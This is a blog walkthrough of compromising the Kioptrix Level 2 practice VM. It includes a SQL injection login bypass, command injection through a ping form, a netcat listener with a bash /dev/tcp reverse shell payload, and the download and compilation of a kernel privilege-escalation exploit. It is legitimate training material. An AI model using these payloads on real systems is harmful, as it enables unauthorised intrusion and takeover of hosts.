Wednesday, 8 February 2017

Kioptrix Level 2 Ping This!

I am really liking this VM series so far as I am the first to admit that my web app fu is not the best.  This is allowing me to go back and test against simpler things as a confidence check for myself.

So how did I root this VM?

It started with a scan

After performing a 1-65535 ports scan using NMap I found out the following ports were open.

Looking at the results it seemed sensible to look at port 80 first.

This is what greeted me:

An admin login screen.  After throwing in some random input into the user and pass fields it showed it was sat on "index.php"  My first thought was "SQLinjection" and it turned out I was right.

A simple:

' OR 1 = 1 -- (don't forget the space after the last - ) 

Gave me access to this page:

I pinged an ip on my network and got this:

It looks like by putting in an ip address and clicking submit calls the pingit.php page.  This shows that it echoes back the ip I typed then actually pings it.  There is a chance I can inject my own commands here.

Command injection 


This method is great for getting shells on boxes.

A look at the source code showed:

The data in the box isn't being sanitised, so my chances of injection now look good :)

I try to list the directory of the website:

And it works!

Now to try to see if I can use a simple bash reverse shell with a netcat listener:

On my attack box I type:

netcat -v -l -p 4444 

This is essentially making my box sit and listen for any connections calling into it on this port.

On the vulnerable web app I type:; bash -i >& /dev/tcp/ 0>&1

This should open a bash reverse shell on my machine.

And it does.  Unfortunately I am only in as apache, so I need to look at elevating my privileges in order to root this box.

Now it was time to start enumerating the box to see what was under the hood.

Looks like I have CentOS 4.5 sat on the Linux  kernel 2.6.9 Research lead me to Exploit-DB
This exploit scores reasonably high over at National Vulnerability Database so should  be quite useful!

I need to see what other tools are sat on this box as I need to be able to transfer the file over.

A quick type of wget show it's installed so that will be handy :)

On my attack box, I wget the code from Exploit-DB:


I then start up a web server on my attack box

python -m SimpleHTTPServer 80 

Now I am serving out the file I can now transfer it to the vulnerable server.

I wget the file from my attack box:

cd /tmp
This is a location I can write to.


Now I have the code, it's time to compile it.

gcc -o pwn 9542.c

I now have an executable file to run.

Another #tangodown


I went into this vm with an attitude that I was going to be looking for local exploits (SUID) for some reason?  This sent me off on a bit of a tangent to be honest.  However once I slapped myself, I got the quickly.

Until next time, bye!!!!!  

No comments:

Post a Comment